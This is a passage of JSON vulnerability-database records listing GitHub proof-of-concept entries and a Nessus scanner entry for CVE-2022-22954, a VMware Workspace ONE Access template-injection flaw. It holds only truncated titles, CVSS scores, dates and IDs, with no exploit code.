"impactScore": 5.9}, "published": "2022-04-12T18:08:58", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Identity Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2023-02-28T07:54:41", "id": "FB4E2E7D-EBA0-5AD8-A2C0-6EE27D053537", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-02-04T02:26:51", "description": "## CVE-2022-22954 PoC\nVMware Workspace ONE Access and Identity M...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T08:51:44", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Identity Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2023-02-04T00:00:44", "id": "0D5F53B0-63C3-52D0-960A-09382DCD6A64", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T02:38:54", "description": "# VMware-CVE-2022-22954-Command-Injector\n\nProof of Concept for e...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-14T23:38:06", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Identity Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-04-16T10:53:07", "id": "979EA51E-E85A-5272-9311-AE6B0A2F756D", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-18T22:15:58", "description": "# CVE-2022-22954-POC\nVMware Workspace ONE Access\uff08\u4ee5\u524d\u79f0\u4e3aVMware Iden...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T02:24:22", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Identity Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-04-16T16:17:13", "id": "C510D823-26C6-5BF9-B30F-5CDF456F72A6", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-03-13T06:09:46", "description": "## CVE-2022-22954 PoC\nVMware Workspace ONE Access and Identity M...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T09:17:12", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Identity Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2023-03-13T03:53:28", "id": "F2545817-7A3F-52E7-ADC5-B775C0DB8082", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T02:39:26", "description": "# CVE-2022-22954-Testi\nCVE-2022-22954 A\u00e7\u0131\u011f\u0131 test etme\n\nVMware Wo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T09:35:17", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Identity Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-04-14T10:25:38", "id": "F12DF8D7-84BD-522E-A6CA-0413FBDFB48F", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-02-09T08:54:46", "description": "# CVE-2022-22954 PoC - VMware Workspace ONE Access Freemarker Se...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T21:15:27", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Identity Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2023-02-09T05:50:36", "id": "B8601FE7-3E95-5AD7-8C4E-05FAB57FBB6D", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-01-31T15:13:29", "description": "# CVE-2022-22954\n\n## Attention\n> Please use this at your own ris...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-11T23:21:50", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Identity Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2023-01-31T13:57:03", "id": "49594F88-14A4-5CA9-9202-ABE72435019C", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-03-02T13:08:10", "description": "# CVE-2022-22954-scanner\n# \u6f0f\u6d1e\u4ecb\u7ecd\nVMware Workspace ONE Access\uff08\u4ee5\u524d\u79f0\u4e3a...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:36:33", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Identity Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2023-03-02T11:15:59", "id": "7EA5501E-29E8-5542-869F-EE5E061312E6", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-03-17T21:30:07", "description": "## CVE-2022-22954 PoC\nVMware Workspace ONE Access and Identity M...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T08:52:15", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Identity Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2023-03-17T19:26:33", "id": "95C17878-3493-5938-9D11-1C33940763BA", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-09-27T23:28:21", "description": "## CVE-2022-22954 PoC\nVMware Workspace ONE Access and Identity M...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-01T18:33:45", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Identity Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-09-27T23:19:15", "id": "F63EAD10-66BD-5AD4-BB46-77371E11031D", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-25T20:53:59", "description": "# CVE-2022-22954\n## \u6f0f\u6d1e\u63cf\u8ff0\n Workspace ONE Access \u63d0\u4f9b\u7edf\u4e00\u5e94\u7528\u95e8\u6237,\u901a\u8fc7\u95e8\u6237\u53ef\u5b89\u5168...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T04:14:36", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Identity Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-08-25T18:06:09", "id": "A4A3F324-E3F8-5601-A653-3BFEBF5A4F46", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-09-27T23:28:23", "description": "## CVE-2022-22954 PoC\nVMware Workspace ONE Access and Identity M...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T01:44:07", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Identity Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-09-27T23:19:10", "id": "76BEF355-6500-5375-ABB3-A0557EB1CDD8", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-11-01T08:34:47", "description": "## CVE-2022-22954 PoC\nVMware Workspace ONE Access and Identity M...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-20T08:08:09", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Identity Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-11-01T02:11:36", "id": "6A61F003-DE4D-520E-AD93-A581E4E22941", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-10-20T02:13:44", "description": "## CVE-2022-22954 PoC\nVMware Workspace ONE Access and Identity M...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-20T01:25:12", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Identity Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-10-20T01:25:27", "id": "EBE5222D-43AE-509D-8C28-291E83DF86C5", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-19T10:11:29", "description": "# CVE-2022-22954\n# VMware Workspace ONE Access\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\n\n## Code ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T04:25:54", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Identity Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-04-13T04:28:45", "id": "D8F56B26-C194-5CA0-83FB-D59BC7014E35", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-11T15:23:29", "description": "# CVE-2022-22954-VMware-RCE\nCVE-2022-22954-VMw...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T05:48:24", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Identity Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-05-11T12:18:03", "id": "4F304699-25C8-5BC6-B6F0-717268F65A9D", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-03-09T06:21:05", "description": "![CVE-2022-22954](https://socialify.git.ci/bewhale/CVE-2022-2295...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T16:18:56", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Identity Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2023-03-09T05:23:15", "id": "CE3963DC-4AF7-5738-83F3-067854F4CE3C", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-15T17:19:08", "description": "# VMware-CVE-2022-22954\n\n# VMware CVE-2022-22954 Workspace ONE A...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T06:35:10", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Identity Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-08-15T15:42:19", "id": "CB8E07F4-50D7-541D-8B3E-749FACA903E3", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "nessus": [{"lastseen": "2023-03-09T02:36:11", "description": "The VMware Workspace One Access (formerly VMware Identity Manager) application running on the remote host is affected by a remote code execution vulnerability due to server-side template injection. An unauthenticated, remote attacker can exploit this, via a specially crafted message, to execute arbitrary code on the remote host.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-25T00:00:00", "type": "nessus", "title": "VMware Workspace One Access / VMware Identity Manager Server-side Template Injection RCE (CVE-2022-22954)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, 